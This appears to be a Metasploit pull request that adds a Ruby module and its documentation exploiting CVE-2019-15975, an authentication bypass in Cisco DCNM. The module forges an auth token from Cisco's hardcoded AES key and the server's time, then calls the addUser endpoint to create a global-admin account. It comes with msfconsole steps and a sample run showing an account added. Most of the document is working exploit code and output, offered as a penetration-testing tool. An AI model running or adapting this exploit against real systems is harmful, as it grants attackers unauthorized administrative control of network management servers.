### PR TITLE
[CVE-2019-15975] Cisco DCNM auth bypass

### DIFF
--- a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.md
@@ -1,21 +1,27 @@
 ## Description
 
-This module exploits CVE-2019-15975 which affects Cisco DCNM 11.2.1 at least. Thanks to this exploit you can add an admin account with any credentials you want. Then you can login to the web interface of Cisco DCNM with those credentials. The only necessary condition is the more or less recent connection (probably something like within the last hours) of an admin as this exploit uses a kind of session stealing. 
+This module exploits CVE-2019-15975 which affects Cisco DCNM versions 11.2 up to but not including 11.3(1). This exploit
+adds an admin account with any credentials you want. Then you can login to the web interface of Cisco DCNM with those
+credentials. The only necessary condition is the more or less recent connection (probably something like within the last
+hours) of an admin as this exploit uses a kind of session stealing.
 
 ## Installation
 
-A vulnerable version of Cisco DCNM can be downloaded from [here](https://software.cisco.com/download/home/281722751/type/282088134/release/11.2(1)). Then follow all the steps in the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for instance (that was my case and I finally had to manually install PostgreSQL).
+A vulnerable version of Cisco DCNM can be downloaded from
+[here](https://software.cisco.com/download/home/281722751/type/282088134/release/11.2(1)). Then follow all the steps in
+the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for
+instance (that was my case and I finally had to manually install PostgreSQL).
 
 ## Verification Steps
 
 List the steps needed to make sure this thing works
 
-- 1. Start `msfconsole`
-- 2. `use auxiliary/admin/networking/cisco_dcnm_auth_bypass`
-- 3. `set RHOST <target_host>`
-- 4. `check` to check if the targeted Cisco DCNM is vulnerable
-- 5. `set USERNAME <username>` and `set PASSWORD <password>` to specify the credentials you want to add
-- 6. `run` the module to exploit the CVE and add an admin account with those credentials
+1. Start `msfconsole`
+2. `use auxiliary/admin/networking/cisco_dcnm_auth_bypass`
+3. `set RHOST <target_host>`
+4. `check` to check if the targeted Cisco DCNM is vulnerable
+5. `set USERNAME <username>` and `set PASSWORD <password>` to specify the credentials you want to add
+6. `run` the module to exploit the CVE and add an admin account with those credentials
 
 ## Options
 
@@ -34,3 +40,21 @@ Set the PASSWORD of the admin account you want to add.
 **RETRIES**
 
 You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.
+
+## Scenarios
+
+### DCNM 11.2(1) - Linux OVA Appliance
+
+```
+msf6 > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
+msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > set RHOST 192.168.159.33
+RHOST => 192.168.159.33
+msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > check
+[+] 192.168.159.33:443 - The target is vulnerable.
+msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > run
+[*] Running module against 192.168.159.33
+
+[+] Admin account with username: 'frederick' and password: '1OwNqJnO' added!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) >
+```

--- a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.md
@@ -1,0 +1,36 @@
+## Description
+
+This module exploits CVE-2019-15975 which affects Cisco DCNM 11.2.1 at least. Thanks to this exploit you can add an admin account with any credentials you want. Then you can login to the web interface of Cisco DCNM with those credentials. The only necessary condition is the more or less recent connection (probably something like within the last hours) of an admin as this exploit uses a kind of session stealing. 
+
+## Installation
+
+A vulnerable version of Cisco DCNM can be downloaded from [here](https://software.cisco.com/download/home/281722751/type/282088134/release/11.2(1)). Then follow all the steps in the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for instance (that was my case and I finally had to manually install PostgreSQL).
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+- 1. Start `msfconsole`
+- 2. `use auxiliary/admin/networking/cisco_dcnm_auth_bypass`
+- 3. `set RHOST <target_host>`
+- 4. `check` to check if the targeted Cisco DCNM is vulnerable
+- 5. `set USERNAME <username>` and `set PASSWORD <password>` to specify the credentials you want to add
+- 6. `run` the module to exploit the CVE and add an admin account with those credentials
+
+## Options
+
+**RHOSTS**
+
+Set the target host.
+
+**USERNAME**
+
+Set the USERNAME of the admin account you want to add.
+
+**PASSWORD**
+
+Set the PASSWORD of the admin account you want to add.
+
+**RETRIES**
+
+You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.

--- a/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Auxiliary
       'uri' => normalize_uri(target_uri.path)
     })
 
-    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+    fail_with(Failure::Unreachable, "Target #{rhost} could not be reached.") unless r
 
     r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
     r_time
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Auxiliary
         return res
       end
     end
-    print_error("Didn't succeed after #{datastore['NBRETRIES']} attempts")
+    print_error("Didn't succeed after #{datastore['RETRIES']} attempts")
     res
   end
 

--- a/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
@@ -1,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'securerandom'
+require 'base64'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco DCNM auth bypass',
+        'Description' => %q{
+          This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.
+          After that, you can login to the web interface with those credentials.
+          The only necessary condition is the more or less recent connection of an admin as this exploit
+          uses a kind of session stealing.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'MR_ME', # Amazing POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2019-15975'],
+            [ 'EDB', '48018']
+          ],
+        'DisclosureDate' => '2020-06-01',
+        'DefaultOptions' => { 'SSL' => true },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptInt.new('RETRIES', [true, 'Retry count for the attack', 50]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
+      OptString.new('USERNAME', [true, 'The username of the admin account you want to add', Faker::Internet.username(specifier: 8..10).gsub(/[^a-zA-Z0-9]/, '')]),
+      OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', Faker::Internet.password(min_length: 8, max_length: 10)])
+    ])
+  end
+
+  KEY = 's91zEQmb305F!90a'.freeze
+
+  class AESCipher
+    def initialize
+      # Cisco's hardcoded key
+      @bs = 16
+    end
+
+    def encrypt(raw)
+      raw = _pad(raw)
+      iv = "\x00" * 0x10
+      cipher = OpenSSL::Cipher.new('aes-128-cbc')
+      cipher.encrypt
+      cipher.key = KEY
+      cipher.iv = iv
+      Base64.encode64(cipher.update(raw))
+    end
+
+    private
+
+    def _pad(size)
+      size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)
+    end
+  end
+
+  def make_raw_token
+    key = 'what_a_nice_key'
+    uuid = SecureRandom.uuid.gsub('-', '')[0..20]
+    time = leak_time
+    raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)
+    raw_token
+  end
+
+  def bypass_auth(token, usr, pwd)
+    d = {
+      'userName' => usr,
+      'password' => pwd,
+      'roleName' => 'global-admin'
+    }
+    h = { 'afw-token' => token }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'headers' => h,
+      'vars_post' => d,
+      'uri' => normalize_uri(target_uri.path + 'fm/fmrest/dbadmin/addUser')
+    })
+
+    if r && r.body != 'Access denied'
+
+      json = r.get_json_document
+
+      case json&.dig('resultMessage')
+      when 'Success'
+        return :success
+      when 'User already exists.'
+        return :user_already_exists
+      when 'Cannot add user since password strength check failed'
+        return :weak_password
+      end
+    else
+      return :failed_to_connect
+    end
+    :fail
+  end
+
+  def leak_time
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+
+    r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
+    r_time
+  end
+
+  def add_admin_account(usr, pwd)
+    res = -1
+
+    datastore['RETRIES'].times do
+      raw = make_raw_token
+
+      cryptor = AESCipher.new
+      token = cryptor.encrypt(raw).gsub("\n", '')
+      res = bypass_auth(token, usr, pwd)
+      if res != :fail && res != :failed_to_connect
+
+        return res
+      end
+    end
+    print_error("Didn't succeed after #{datastore['NBRETRIES']} attempts")
+    res
+  end
+
+  def check
+    res = add_admin_account('test', 'test')
+
+    if res == :success || res == :user_already_exists || res == :weak_password
+      Exploit::CheckCode::Vulnerable
+    elsif res == :failed_to_connect
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run
+    res = add_admin_account(datastore['USERNAME'], datastore['PASSWORD'])
+    if res == :success
+      print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
+    elsif res == :weak_password
+      print_error('Unable to add admin account due to bad password strength')
+    elsif res == :user_already_exists
+      print_error('Unable to add admin account because this username already exists')
+    else
+      print_error('Something went wrong')
+    end
+  end
+end


### PR DESCRIPTION
## Description

This module exploits CVE-2019-15975 which affects Cisco DCNM 11.2.1 at least. Thanks to this exploit you can add an admin account with any credentials you want. Then you can login to the web interface of Cisco DCNM with those credentials. The only necessary condition is the more or less recent connection of an admin as this exploit uses a kind of session stealing. 

## Installation

A vulnerable version of Cisco DCNM can be downloaded from [here](https://software.cisco.com/download/home/281722751/type/282088134/release/11.2(1)). Then follow all the steps in the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for instance (that was my case and I finally had to manually install PostgreSQL).

## Verification Steps

List the steps needed to make sure this thing works

- [x]  Start `msfconsole`
- [x] `use auxiliary/admin/networking/cisco_dcnm_auth_bypass`
- [x]  `set RHOST <target_host>`
- [x]  `check` to check if the targeted Cisco DCNM is vulnerable
- [x]  `set USERNAME <username>` and `set PASSWORD <password>` to specify the credentials you want to add
- [x]  `run` the module to exploit the CVE and add an admin account with those credentials

## Demonstration

![image](https://user-images.githubusercontent.com/84333864/120206422-78bd8280-c22b-11eb-8f4b-a5f4b75120a7.png)

View of the admin account added in DCNM web interface : 

![image](https://user-images.githubusercontent.com/84333864/120206164-22e8da80-c22b-11eb-904a-99798a968ae5.png)